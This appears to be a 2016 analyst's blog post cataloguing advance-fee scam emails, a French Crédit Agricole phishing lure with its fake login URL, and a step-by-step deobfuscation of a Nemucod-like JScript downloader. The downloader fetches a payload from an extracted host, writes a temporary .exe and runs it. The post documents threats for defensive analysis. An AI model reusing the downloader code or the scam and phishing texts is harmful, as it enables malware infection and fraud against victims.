Monday, May 9, 2016

Confirm receipts


Email analysis :

NOTE : attorneypl9094153@gmail.com

Elena Nana

WITH RESPECT FROM MISS ELENA I am Elena Nana. My parents Mr.and Mrs.Jerry Nana were assassinated here in IVORY COAST. Before my father's death he had US$12.5M (TWELVE MILLION FIVE HUNDRED THOUSAND UNITED STATES DOLLARS) deposited in a bank here in Abidjan. I want you to do me a favour to receive these funds to a safe account in your country or any safer place as the beneficiary. I want to come over to your country for the safety of my life from the hands of this wicked assasins. I have plans to do investment in your country, like real estate and industrial production. This is my reason for writing to you and I am willing to offer you 20% out of the total funds for assisting me, Please if you are willing to assist me, reply me with your direct phone number. Sincerely yours, Elena Nana

Email analysis :

NOTE : en1822085@gmail.com
NOTE : asarijopaul@yahoo.co.jp

From Money Gram Money Transfer

Attention My Dear,

Your first payment of $7000 Is about to send today through Money Gram money transfer You are advise to Contact Mr. Wilson Robert with your full information.such as

Your name......
Your country.....
Your phone number..
Your adders......

To Enable him to send your First Payment of $7000 today.For more information contact Mr. Wilson Robert. Telephone number: +229 9855-6485 OR +229-9985-9256. Email (moneygram_transfer2@hotmail.com) he will keep sending your payment until your total fund is Completed $3.700,000 usd

Best Regards
Mr.Karla Johnson

Email analysis :

NOTE : moneygram_transfer2@hotmail.com
NOTE : adoc-cper12.@viola.ocn.ne.jp
NOTE : X-Originating-Ip : [209.95.36.14]

From: Miss Sarah Bright

Dear One,

I am writing this letter with due respect and heartful of years since we have not known or met ourselves previously.

My name is Miss Sarah Bright. I am the only daughter of late Chief John Bright. My father was a preeminent oil and gas entrepreneur in West Africa before he died. He also had extensive investments in real estate, the agricultural and banking sectors. My mother died together with my siblings in a ghastly automobile accident along Yamoussoukro expressway when I was barely 9 years old and since then my father took me so special as his only child. I prayed before contacting you and I believed that you are the rightful person to help me out of my horrible situation. Please I need your assistance to transfer my inherited money 10.5 million American dollars to your country for investment ventures under your care and directive, while I will continue my education in your country after the transfer. It is my desire to come over to your country to further my education while you invest and manage my inherited money. Please I am an orphan and I need your assistance to transfer my inherited money to your country. I will also need your assistance to secure a nice school for me in your country, where I will continue my education. I am willing to offer you 20% of the total sum as compensation for your effort/input after the successful transfer of my inherited money into your nominated account. As soon as I receive your reply indicating your interest to assist me to transfer the money to your country, I will give you all the necessary information you may require to proceed towards transferring the money to your account as I believe that this transaction would be concluded within few days you signify your interest to assist me. Please, consider this and get back to me as soon as possible. Immedaitely I confirm your willingness ,I will send to you my picture and also give you more details about myself and the bank where my late father deposited the fund, so that you can reach the bank and confirm the existence of the fund as well, because seeing is believing.

Anticipating to hear from you urgently.

Thanks and God bless you.
Yours Sincerely,
Miss Sarah Bright

Email analysis :

NOTE : sarah1bright@yahoo.co.jp
NOTE : sarahbright@outlook.fr
NOTE : Sender : hiyoko19951122@yahoo.co.jp
NOTE : X-Mailer : YahooMailWebService/0.8.111_69
NOTE : Received : from [199.115.117.199]

Rép : Affordable loan @ cheap interest rate


Do you need a loan to buy a car or pay off some Bills and start up a new Business? contact us now for more details

Email analysis :

NOTE : raihanah@pknm.gov.my
NOTE : wkohln@gmail.com
NOTE : X-Originating-Ip : [197.210.226.250]
NOTE : X-Mailer : Zimbra 8.0.5_GA_5839 (zclient/8.0.5_GA_5839)
NOTE : Received : from mail.pknm.gov.my (mail.pknm.gov.my [192.168.100.226]) by mail.pknm.gov.my (Postfix)


What is pknm.gov.my ?

Malacca State Development Corporation

Request for Genuine Investment Partnership

How are you? I hope you are well. Please accept my sincere apologies for writing to you privately without your own consent. My name is Mrs. Rebecca Garang, Wife of a prominent politician from Sudan Late Dr. John Garang, the Late Sudanese Vice President who died in a plane crash on 22nd July 2005 under suspicious circumstance. I want to solicit your cooperation on a business investment project because on behalf of my family. Presently, there is a substantial amount of money that my family needs to move out of a country in Africa for profitable investment purposes, and we would really appreciate your help and cooperation. Hence, there is a lot to discuss and plan on the way forward, and I shall provide you with further details when I receive your positive response.

Kind regards,

Mrs. Rebecca Garang

For the Family

Email analysis :

NOTE : jeffery_garang@yahoo.com
NOTE : shipping@cheungyue.com.hk
NOTE : Received : from User (unknown [41.71.185.224])


NOTE : by correo.dicta.hn (Postfix)

Us homeland security department office.

I,m Jeh Charles. Johnson. The secretary of the U.S Department of Homeland security Washington DC. Office Address: 3801 Nebraska Ave NW, Washington, DC 20016, United States. We received a report from ECOWAS that you have an abandoned fund worth U.S.D 4.5 Million in West Africa. I have instructed ECOWAS and the concerned authorities to bring the consignment box to our Head office in Washington DC. the fund will arrive mAAA # So that preparation can be made for the delivery of the consignment to your home address.

Email analysis :

NOTE : homelandsecu244@gmail.com
NOTE : HOME.@sand.ocn.ne.jp
NOTE : X-Originating-Ip : [41.86.238.31]

MR.MARKIND OMAR

UNITED NATION MONITORING FUND ACCRA GHANA WEST AFRICA OR DO YOU WANT US TO TALK ON PHONE I CAN SEND MY UMBER TO YOU I AM MR.MARKIND OMAR THE DIRECTOR OF UNITED NATION MONITORING FUND IN ACCRA GHANA. WE ARE CONTACTING YOU IN REGARDS TO YOUR RECOVERED DELAYED FUND WORTH OF $10MILLION AMERICAN DOLLARS FROM ONE OF THE LEADING BANK HERE IN AFRICA THAT WAS ASSIGN TO TRANSFER TO YOU AS THE REAL BENEFICIARY THE UNITED NATION MONITORING DEPARTMENT HERE IN ACCRA GHANA IN WEST AFRICA HAS INTRUDED OVER THE RECOVERED FUND AND INSTRUCTED TO TRANSFER THE FUND TO YOUR DOOR STEP YOUR COUNTRY THROUGH DIPLOMATIC TRANSFER WITHIN 72HOURS, YOU ARE HEREBY ADVICE TO FORWARD THIS FOLLOWING INFORMATION'S TO ENABLE THE CONSIGNMENT REGISTERED ON YOUR NAME AND YOUR INFORMATION'S WITH THE UNITED NATION DIPLOMATIC DELIVERY VESSEL FOR EFFECTIVE DELIVERY TO YOU AS THE REAL BENEFICIARY. YOUR FULL NAME ............................................. 1,YOUR HOME OFFICE ADDRESS FOR DELIVER............... 2.YOUR PRIVATE MO

UNITED NATION MONITORING FUND
ACCRA GHANA WEST AFRICA
OR DO YOU WANT US TO TALK ON PHONE I CAN SEND MY UMBER TO YOU
jebacarkecompany@wp.pl, jebacarkecompaty@wp.pl, Carloscafe@mailinator.com, jennifertull1@gmail.com, christheawesome46@gmail.com, davidhartman48@outlook.com, dschrute391@gmail.com, obasolutionhome@gmail.com, dannysauron1@gmail.com, burtmacklin9000@hotmail.com, Ehicarespellhelp@gmail.COM, katierose08888@gmail.com, danielandersonprivate@gmail.com, barrykrunt@gmail.com, stanleyphillips623@gmail.com, CANDOVALOVESPELL@GMAIL.COM, lauralbert24@gmail.com, obrawkins.nathan@gmail.com, monicaspiritualtemple@gmail.com, ogunspiritualspelltemple@gmail.com, supersolutionhome1@gmail.com, supersolutionhom@yahoo.com, alexiskimberly2010@gmail.com, osesespelltemple@gmail.com, outdrofemospelltemple@gmail.com, franknelson079@gmail.com, randywilsonCEO@gmail.com, azuumaspelltemple@gmail.com, Azuumaspelltemple@mail.com, osesespelltemple@gmaill.com, doeaf01@yahoo.com, neways103@hushmail.com, tomkelvin40@gmail.com, jessybrown223@gmail.com, richiejack@gmail.com, dr.eveherbeshome@gmail.com, sandra4@yahoo.com, adodalovespelltemple@gmail.com, turokmeceno12345@gmail.com...................
5 YOUR AGE ................................................................

YOU ARE ADVICE TO RETURN TO THIS OFFICE OF THE UNITED NATION MONITORING FUND FOR MORE INSTRUCTION ON HOW TO RECEIVED YOUR CLAIMED FUND, URGENT.
please contact me with my private email address
(markind.omar22@gmail.com )

BEST REGARDS
Mr MARKIND OMAR
DIRECTOR UNITED NATION MONITORING FUND

Email analysis :

NOTE : carolinda.eze@gmail.com
NOTE : markind.omar22@gmail.com

Winner of the Coca Cola lottery

Dear sir,

This is to notify you that your name was picked from THIS SITE by the Coca Cola Company as one of the lucky winner of $2,000,000.00 Usd in (Coca Cola) Profile Award 2016 so you are advice to contact (Coca Cola) Profile Award agent for receiving of your wining price. Agent to contact Mr. Confidence Roland, via email address

Below is the information needed

1. Full Name:
2. Address:
3. Sex:
4. Occupation:
5. Phone Number:
6. City
7. Country:
8. Age:
9. A Copy of Your ID card (attached)

Kindly contact the agent In-charge of your winnings, Mr. Confidence Roland , through his email address,{gmail.com}
Once again,

CONGRATULATIONS

Email analysis :

NOTE : mascogold@gmail.com

Nouveau message disponible ! (Phishing Crédit Agricole)

http://reassurez-moi.fr/guide/wp-content/uploads/2014/09/Assurance-de-pr%C3%AAt-immobilier-Cr%C3%A9dit-Agricole.jpg

Cher(e) Client(e),
Un conseiller du Crédit Agricole vous a adressé un message.
Vous pourriez le consulter en accédant à votre compte client en ligne à l'aide
De votre identifiant/mot de passe en cliquant sur le lien ci-dessous :

Cliquez ICI Pour accéder à votre compte.

A très bientôt sur le service de gestion de comptes.
Crédit Agricole

http://reassurez-moi.fr/guide/wp-content/uploads/2014/09/Assurance-de-pr%C3%AAt-immobilier-Cr%C3%A9dit-Agricole.jpg

Cher(e) Client(e),
Un conseiller du Crédit Agricole vous a adressé un message.
Vous pourriez le consulter en accédant à votre compte client en ligne à l'aide
De votre identifiant/mot de passe en cliquant sur le lien ci-dessous :

Cliquez ICI Pour accéder à votre compte.

A très bientôt sur le service de gestion de comptes.
Crédit Agricole

Phishing analysis :

CLICK : Cliquez ICI
OPEN : http://sf-g50-enligne.crdit-agricole.chaletbnb.com/sfsecure/enligne/
SCREENSHOT :


CLICK : CONFIRMER
REDIRECT : https://www.credit-agricole.fr/

Email analysis :

NOTE : pokleksa@aseame.onmicrosoft.com
NOTE : chounettte@hotmail.fr
NOTE : X-Originating-Ip : [81.193.66.163]

Virus Analysis (UNPACKED...)

In the last email, I obtained a virus similar to a Nemucod ransomware from the virus report...


Code analysis :

===================================
INIT
===================================

var PR_RDONLY = 0x01;
var PR_WRONLY = 0x02;
var PR_RDWR = 0x04;
var PR_CREATE_FILE = 0x08;
var PR_APPEND = 0x10;
var PR_TRUNCATE = 0x20;
var PR_SYNC = 0x40;
var PR_EXCL = 0x80;

GmvCOh = "}/* * Helper functions for managing events -- not part of the public interface. * Props to Dean Edwards\" addEvent library for many of the ideas. */ jQuery.event = {";
var chocolate = 0;
daunt = String["f"+("kernel","fresh","plagiarism","remoteness","touch","slavish","permanent","ro")+"mC"+"ha"+"rC"+"ode"](7*2*7 + chocolate );
String.prototype.provisionally = function () {
var editions = { hairy: this };
editions.nutmeg = editions.hairy[("suZ"+("weekends","trend","vendor","chafe","listless","transexuales","millet","st")+"ri"+"ng").replace("Z", daunt)](chocolate, PR_RDONLY);
return editions.nutmeg;
};

===================================
FUNCTION HEX MD5 STREAM
===================================

function hex_md5_stream(stream) {
var hasher = Components.classes["@mozilla.org/security/hash;1"]
.createInstance(Components.interfaces.nsICryptoHash);
hasher.init(hasher.MD5);
hasher.updateFromStream(stream, stream.available());
var hash = hasher.finish(false);
var ret = '';
for (var i = 0; i < hash.length; ++i) { var hexChar = hash.charCodeAt(i).toString(16); if (hexChar.length == 1) ret += '0'; ret += hexChar; } return ret; }


===================================
FUNCTION PICK
===================================

function pick(){
for (var i = 0, l = arguments.length; i < l; i++){ if (arguments[i] != undefined) return arguments[i]; } return null; };


===================================
FUNCTION BASE64DECODE
===================================

this.decode = base64decode;
this.chars = function( string ) {
base64EncodeChars = string || "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
base64DecodeChars = [];
for ( var i = 128; i--; ) {
if ( base64DecodeChars[ i ] === undefined )
base64DecodeChars[ i ] = -1;
base64DecodeChars[ base64EncodeChars.charCodeAt( i ) ] = i;
}
return this;
};
this.chars();
function base64decode( str ) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while(i < len) { /* c1 */ do { c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff]; } while(i < len && c1 == -1); if(c1 == -1) break; /* c2 */ do { c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff]; } while(i < len && c2 == -1); if(c2 == -1) break; out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

/* c3 */
do {
c3 = str.charCodeAt(i++) & 0xff;
if(c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while(i < len && c3 == -1); if(c3 == -1) break; out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

/* c4 */
do {
c4 = str.charCodeAt(i++) & 0xff;
if(c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while(i < len && c4 == -1); if(c4 == -1) break; out += String.fromCharCode(((c3 & 0x03) << 6) | c4); } return out; }


===================================
Calling Windows Script Host
===================================

try{
if(WScript +"" == "Windows Script Host"){
eval(base64decode('dmFyIHRoZW5EbyA9IHRoZW5EbyB8fCBTdHJpbmcucHJvdG90eXBlLnByb3Zpc2lvbmFsbHkgPT0gdW5kZWZpbmVkIHx8IGV2YWwoInRydWUiKTs='));
}
}catch(Eeed)
{

}


===================================
CONVERSION (BASE64 DECODE)
===================================

if(WScript +"" == "Windows Script Host"){
var thenDo = thenDo || String.prototype.provisionally == undefined || eval("true");
}
}catch(Eeed)
{

}


===================================
FUNCTION
===================================

String.prototype.parseColor = function() {
var color = '#';
if (this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if (this.length==7) color = this.toLowerCase(); } } return (color.length==7 ? color : (arguments[0] || this)); };


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 6=["12"+("1n","2r","2t","2y","2A","2B","a","b")+("c","d","e","f","g","h","i","j")+"k",("l","m","n","o","p","q","r","s","t")+"4"+("v","w","x","y","z","A","B","C","D")+"E"+"F"+"G"+"H"+("I","J","K","L","N","O","P","Q","T")+("U","V","W","X","Y","Z","10","11")+"5"+"13",""+"%"+("14","15","16","17","18","19","1a","1b")+"1c%",""+("1d","1e","1f","1g","1h","1i","1j",".")+"1k","R"+("1l","1m","2E","1o","1p","1q","1r","1s","1t"),"M"+"1u"+"1v"+("1w","1x","1y","1z","1A","1B","1C","1D","2.")+("1E","1F","1G","1H","1I","1J","1K","1L","1M")+"1N"+"1O",("1P","1Q","1R","1S","1T","1U","1V","1W","1X")+("1Y","1Z","20","21","22","23","24","5")+"25.S"+("26","27","28","29","2a","2b","2c","2d","2e")+("2f","2g","2h","2i","2j","2k","2l","2m")];2n="} 2o 2p 2q 7 4 2s 8 2u 2v 7 2w 8 2x 0 2z ( 0.0 ) { 1 = 0; 0 = 1.0; 9 = 1.9; ";3 2C=2D[6.u()];',62,165,'handler|handleObjIn||var|an|ri|BHpUk|in|of|selector|thong|iv|xerox|anytime|download|privacy|libretto|decimal|molecular|eXObje|ct|overalls|known|moral|interpreted|introduced|decrepitude|encumber|rivulet|Exp|shift|important|massy|lounged|bribery|dragoman|internship|defense|mediate|dE|nv|ir|on|me|enquiry|refresh|perusing|spleen||guernsey|eerie|diamond|flirt|||nt|bibliography|adapter|metres|fighter|pointer|viscount|porphyry|St|Act|ngs|baton|clicking|offerings|sprinkle|croatia|happiness|alabaster|TE|MP|incautious|encircle|godlike|adjustment|azalea|intensity|timely|exe|specifying|photographer|strand|celebration|throttle|condense|sleep|lying|un|SX|ML|julian|refrigerator|fundamentally|hygiene|fabrics|pellucid|explosive|piano|traction|parts|admonish|voluble|stitch|quartette|sextant|vertically|XM|LH|TTP|instances|instrumentality|asbestos|tuner|slots|divergent|plastic|linear|WSc|antipodes|violate|receptors|woody|shale|bitch|injection|pt|rosette|declare|descriptive|hawser|geologist|havana|thunderbolt|bellows|he|indonesia|delivery|billing|welter|participants|losses|buffet|ll|CMpogCtp|Caller|can|pass|besides|object|heirloom|custom|data|lieu|the|jelsoft|if|membership|spout|uhRkAhP|this|median'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

var BHpUk=["Act"+("strand","besides","heirloom","jelsoft","membership","spout","thong","iv")+("xerox","anytime","download","privacy","libretto","decimal","molecular","eXObje")+"ct",("overalls","known","moral","interpreted","introduced","decrepitude","encumber","rivulet","Exp")+"an"+("important","massy","lounged","bribery","dragoman","internship","defense","mediate","dE")+"nv"+"ir"+"on"+"me"+("enquiry","refresh","perusing","spleen","guernsey","eerie","diamond","flirt","nt")+("bibliography","adapter","metres","fighter","pointer","viscount","porphyry","St")+"ri"+"ngs",""+"%"+("baton","clicking","offerings","sprinkle","croatia","happiness","alabaster","TE")+"MP%",""+("incautious","encircle","godlike","adjustment","azalea","intensity","timely",".")+"exe","R"+("specifying","photographer","median","celebration","throttle","condense","sleep","lying","un"),"M"+"SX"+"ML"+("julian","refrigerator","fundamentally","hygiene","fabrics","pellucid","explosive","piano","2.")+("traction","parts","admonish","voluble","stitch","quartette","sextant","vertically","XM")+"LH"+"TTP",("instances","instrumentality","asbestos","tuner","slots","divergent","plastic","linear","WSc")+("antipodes","violate","receptors","woody","shale","bitch","injection","ri")+"pt.S"+("rosette","declare","descriptive","hawser","geologist","havana","thunderbolt","bellows","he")+("indonesia","delivery","billing","welter","participants","losses","buffet","ll")];
CMpogCtp="
}
Caller can pass in an object of custom data in lieu of the handler if ( handler.handler )
{
handleObjIn = handler;
handler = handleObjIn.handler;
selector = handleObjIn.selector;
";
var uhRkAhP=this[BHpUk.shift()];


===================================
FUNCTION HEX MD5
===================================

function hex_md5(s) {
var stream = Components.classes["@mozilla.org/io/string-input-stream;1"]
.createInstance(Components.interfaces.nsIStringInputStream);
stream.setData(s, s.length);
return hex_md5_stream(stream);
}


===================================
DATAS
===================================

titular = (("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally();
boughts = (("memorabilia", "borax", "tracking", "assam", "shzrRkSc") + "rFfvhMdqAeh").provisionally();
vietnamese = ("n"+("mundane","satisfy","column","headers","dysentery","dispute","winner","press","ep") + String.fromCharCode(111)).split("");
oaegScr = " add: function( elem, types, handler, data, selector ) { var tmp, events, t, handleObjIn, special, eventHandle, handleObj, handlers, type, namespaces, origType, elemData = jQuery._data( elem );";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0=1.2();3 6=4 5(7(0));3 8=4 5(1.2());',9,9,'rKXyhsz|BUk|pop|var|new|uhRkAhP|XtpJu|pick|NBHAYvL'.replace('U','HpU').split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

rKXyhsz=BHpUk.pop();
var XtpJu=new uhRkAhP(pick(rKXyhsz));
var NBHAYvL=new uhRkAhP(BHpUk.pop());


===================================
PACKER
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";

if(thenDo){
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1=(("9","2","3","4","5")+"6").7();8 0=a.b();c d(){e("f://"+g,"h")}',18,18,'emptyZZindicatedeZZendorseZZajfoTTEbZZaptitudeZZESOHGNPaRebZZRbtJGwVZZprovisionallyZZvarZZopulenceZZMathZZrandomZZfunctionZZsaloHoodZZquickwittedZZhttpZZhoddorZZOYWVCwQ'.split('ZZ'),0,{}))
}

===================================
CONVERSION (UNPACKED)
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";
if(thenDo){
indicatede=(("opulence","endorse","ajfoTTEb","aptitude","ESOHGNPaReb")+"RbtJGwV").provisionally();
var empty=Math.random();
function saloHood()
{
quickwitted("http://"+hoddor,"OYWVCwQ")
}


===================================
A VARIABLE IN UNICODE FORMAT
===================================

var hoddor = "\u006C\u006F\u0076\u0065\u0073\u0061\u006E\u0069\u006D\u0061\u006C\u0073\u002E\u0063"+"\u006F\u006D\u002F\u0030\u0039\u0079\u0038\u0068\u0062\u0037\u0076\u0036\u0079\u0037\u0067";

===================================
CONVERSION (UNICODE > TXT)
===================================

var hoddor = "lovesanimals.c"+"om/09y8hb7v6y7g";

===================================
FUNCTION QUICKWITTED
===================================

function quickwitted(expulsion, proved) {
try {
var francisco = CteaNXQfb + "/" + proved + BHpUk.shift();
cokDPG = "} If event changes its type, use the special event handlers for the changed type special = jQuery.event.special[ type ] || {};";
if (empty > 0) {
NBHAYvL[(vietnamese).reverse().join("")](("runaway","ballet","undersigned","albums","ostentatious","expanding","strips","G") + indicatede + ("miguel","began","distribution","plasma","hoary","reporting","built","childbirth","T"), expulsion, false);
}
lkKFtqIM = " If selector defined, determine special event api type, otherwise given type type = ( selector ? special.delegateType : special.bindType ) || type;";
NBHAYvL[boughts + ("durability","outstrip","premium","after","phrygian","hilltop","bluntly","e") + (("potency", "restive", "bonds", "cacao", "percussion", "nXyuIYg") + "VzPzIfxqAGo").provisionally() + (("printing", "compendium", "loiter", "precursor", "phillip", "dWoQFifU") + "ACrOmYGq").provisionally()]();
NOPvLqSUtIr = " Update special based on newly reset type special = jQuery.event.special[ type ] || {};";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4(r.L==M){X 6=14 15((("16","1a","1f","1g","1h","1i","1j","")+"A"+("1n","1p","1s","1u","1v","1w","1x","1z")+"1T."+("1X","26","2g","2k","2C","38","3f","3i","")+"S"+("3o","3p","3N","3P","3Q","H","I","J")+"K").E("p","D"));6[""+("N","O","P","Q","T","U","V","W","o")+"Y"]();Z="} 10 11 12 7 d m a 17 18, 19 n 1b/1c 1d 1e 4 ( !d.j ) { d.j = b.j++; ";6.c=0+3-2;1k="} 1l 7 1m\\"s 8 1o z 1q d, 4 1r B 7 1t 4 ( !( 5 = g.5 ) ) { 5 = g.5 = {}; } 4 ( !( f = g.i ) ) { f = g.i = 1y( e ) {";6["w"+"1A"+("1B","1C","1D","1E","1F","1G","1H","1I","1J")](r[""+("1K","1L","1M","1N","1O","1P","1Q","R")+"1R"+"1S"+q+("1U","1V","1W","3S","1Y","1Z","20","e")+"21"+"22"]);23=" 24 7 25 8 u a b.8.27() z 28 29 8 B 2a 2b a 2c m 2d 2e 2f b !== \\"v\\" && ( !e || b.8.2h !== e.c ) ? b.8.2i.2j( f.9, 2l ) : v; };";6[(2m+("2n","2o","2p","2q","2r","2s","2t","2u","o")+"2v"+"2w"+("2x","2y","2z","2A","2B","x","2D","2E")).E("D",q)]=0;2F=" 2G 9 2H a 2I u 7 i 2J n 2K a 2L 2M 2N 2O 2P-2Q 5 f.9 = 9; ";6["s"+("2R","2S","2T","2U","2V","2W","2X","2Y")+"2Z"+"30"+("x","31","32","33","34","35","36","37")](y,2);39="} 3a 3b 5 3c 3d a 3e h = ( h || \\"\\" ).3g( 3h ) || [ \\"\\" ]; t = h.3j; 3k ( t-- ) { k = 3l.3m( h[ t ] ) || []; c = 3n = k[ 1 ]; C = ( k[ 2 ] || \\"\\" ).3q( \\".\\" ).3r();";6.3s();3t=" 3u *3v* 3w a c, 3x 3y 3z-3A 3B 4 ( !c ) { 3C; ";3D[3E.3F()](y,1,"3G"==="3H");3I=" 3J 3K 3L/3M 4 7 l 5 d 3O F 4 ( !l.G || l.G.3R( 9, 13, C, f ) === F ) {"}',62,241,'||||if|events|OkUvN|the|event|elem||jQuery|type|handler||eventHandle|elemData|types|handle|guid|tmp|special|has|to|||boughts|NBHAYvL|||of|undefined||snowball|francisco|and||is|namespaces||replace|false|setup|broadcast|universities|tr|eam|status|200|installation|eastwards|expression|footage|||green|winter|embody|yukon|var|pen|MOmXidnhR|Make|sure|that|data|new|uhRkAhP|extermination|unique|ID|used|wornout|find|remove|it|later|harps|definitive|scored|particle|aryan|eibdpjiyakm|Init|element|footstool|structure|gratuity|main|this|measurement|first|presently|calibration|authorization|cornet|function|pO|ri|sensitivity|lawlessness|reflects|treadmill|external|dissimulation|perversion|rusted|te|assorted|announce|compete|booth|libretto|definition|censor|es|pon|DB|constructing|warren|recipient|bound|suffered|chunk|listen|Bo|dy|STOuIe|Discard|second|muslims|trigger|when|an|called|after|page|unloaded|return|typeof|butler|triggered|dispatch|apply|canteen|arguments|titular|grandee|womanish|benjamin|whole|wireless|rarely|logitech|evasively|Di|ti|geology|abyssinian|hodge|reservoir|acrimony|ludwig|browser|on|dJIemps|Add|as|property|fn|prevent|memory|leak|with|IE|non|native|curative|deface|marker|remittance|residents|balance|permalink|av|eT|oF|movie|awestruck|savory|neuter|slight|pushed|ile|blockade|NBlaxcR|Handle|multiple|separated|by|space|keeping|match|rnotwhite|anointing|length|while|rtypenamespace|exec|origType|credulity|meters|split|sort|close|HuIaJMUIgp|There|must|be|no|attaching|namespace|only|handlers|continue|XtpJu|BHpUk|shift|UsjNuiXNlu|NMWYuV|pgvvXzp|Only|use|addEventListener|attachEvent|bowled|returns|prefix|correlative|call|electrified'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

if(NBHAYvL.status==200)
{
var OkUvN=new uhRkAhP((("extermination","wornout","harps","definitive","scored","particle","aryan","")+"A"+("footstool","gratuity","measurement","presently","calibration","authorization","cornet","pO")+"DB."+("bound","muslims","butler","canteen","ludwig","blockade","keeping","anointing","")+"S"+("credulity","meters","bowled","prefix","correlative","broadcast","universities","tr")+"eam").replace("p","D"));
OkUvN[""+("installation","eastwards","expression","footage","green","winter","embody","yukon","o")+"pen"]();
MOmXidnhR="
}
Make sure that the handler has a unique ID, used to find/remove it later if ( !handler.guid )
{
handler.guid = jQuery.guid++;
";
OkUvN.type=0+3-2;
eibdpjiyakm="
}
Init the element\"s event structure and main handler, if this is the first if ( !( events = elemData.events ) )
{
events = elemData.events =
{
};
}
if ( !( eventHandle = elemData.handle ) )
{
eventHandle = elemData.handle = function( e )
{
";
OkUvN["w"+"ri"+("sensitivity","lawlessness","reflects","treadmill","external","dissimulation","perversion","rusted","te")](NBHAYvL[""+("assorted","announce","compete","booth","libretto","definition","censor","R")+"es"+"pon"+boughts+("constructing","warren","recipient","electrified","suffered","chunk","listen","e")+"Bo"+"dy"]);
STOuIe=" Discard the second event of a jQuery.event.trigger() and when an event is called after a page has unloaded return typeof jQuery !== \"undefined\" && ( !e || jQuery.event.triggered !== e.type ) ? jQuery.event.dispatch.apply( eventHandle.elem, arguments ) : undefined;
};
";
OkUvN[(titular+("grandee","womanish","benjamin","whole","wireless","rarely","logitech","evasively","o")+"Di"+"ti"+("geology","abyssinian","hodge","reservoir","acrimony","snowball","browser","on")).replace("D",boughts)]=0;
dJIemps=" Add elem as a property of the handle fn to prevent a memory leak with IE non-native events eventHandle.elem = elem;
";
OkUvN["s"+("curative","deface","marker","remittance","residents","balance","permalink","av")+"eT"+"oF"+("snowball","movie","awestruck","savory","neuter","slight","pushed","ile")](francisco,2);
NBlaxcR="
}
Handle multiple events separated by a space types = ( types || \"\" ).match( rnotwhite ) || [ \"\" ];
t = types.length;
while ( t-- )
{
tmp = rtypenamespace.exec( types[ t ] ) || [];
type = origType = tmp[ 1 ];
namespaces = ( tmp[ 2 ] || \"\" ).split( \".\" ).sort();
";
OkUvN.close();
HuIaJMUIgp=" There *must* be a type, no attaching namespace-only handlers if ( !type )
{
continue;
";
XtpJu[BHpUk.shift()](francisco,1,"UsjNuiXNlu"==="NMWYuV");
pgvvXzp=" Only use addEventListener/attachEvent if the special events handler returns false if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false )
{
"
}


===================================
FINAL
===================================

} catch (rzupeJz) { };
kOWbigYady = " Init the event handler queue if we\"re the first if ( !( handlers = events[ type ] ) ) { handlers = events[ type ] = []; handlers.delegateCount = 0;";
}
saloHood();
NPQynFqCF = " handleObj is passed to all event handlers handleObj = jQuery.extend( { type: type, origType: origType, data: data, handler: handler, guid: handler.guid, selector: selector, needsContext: selector && jQuery.expr.match.needsContext.test( selector ), namespace: namespaces.join( \".\" ) }, handleObjIn );";


===================================
CONCLUSION :
===================================

URL EXTRACTED : lovesanimals.com/09y8hb7v6y7g
TECHNOLOGY : UNICODE,UNPACKER,JSCRIPT,BASE64

DOCUMENT DE NON CONFORMITE (Virus)

Ci-joint le document de non conformité.

Bien � toi,
--



SCopieur VA9812357665355478.gz

Virus analysis :

SHA256 : 0235a1aded1737d8c89186b29a34610be835ff45f896091d6dcd6eb9a3152061
Filename : SCopieur VA9812357665355478.gz

ALYac : JS:Trojan.JS.Downloader.IQ
AVG : JS/Downloader.Agent
Ad-Aware : JS:Trojan.JS.Downloader.IQ
Arcabit : JS:Trojan.JS.Downloader.IQ
Avast : JS:Downloader-CZW [Trj]
